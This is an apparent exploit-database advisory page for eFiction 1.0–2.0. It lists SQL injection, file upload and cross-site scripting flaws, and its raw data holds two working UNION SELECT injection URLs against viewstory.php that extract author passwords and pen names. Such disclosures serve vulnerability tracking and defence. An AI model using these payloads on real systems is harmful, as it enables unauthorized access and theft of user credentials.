header-logo
Suggest Exploit
vendor:
eFiction
by:
Unknown
7.5
CVSS
HIGH
SQL Injection, Remote File Upload, Cross Site Scripting
89
CWE
Product Name: eFiction
Affected Version From: 1
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:efiction:efiction:1.0cpe:/a:efiction:efiction:1.1cpe:/a:efiction:efiction:2.0
Metasploit:
Other Scripts:
Platforms Tested:
2005

eFiction Multiple Vulnerabilities

eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.

Mitigation:

Apply patches or updates from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15568/info
  
eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities.
  
These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.
  
eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected. 

http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*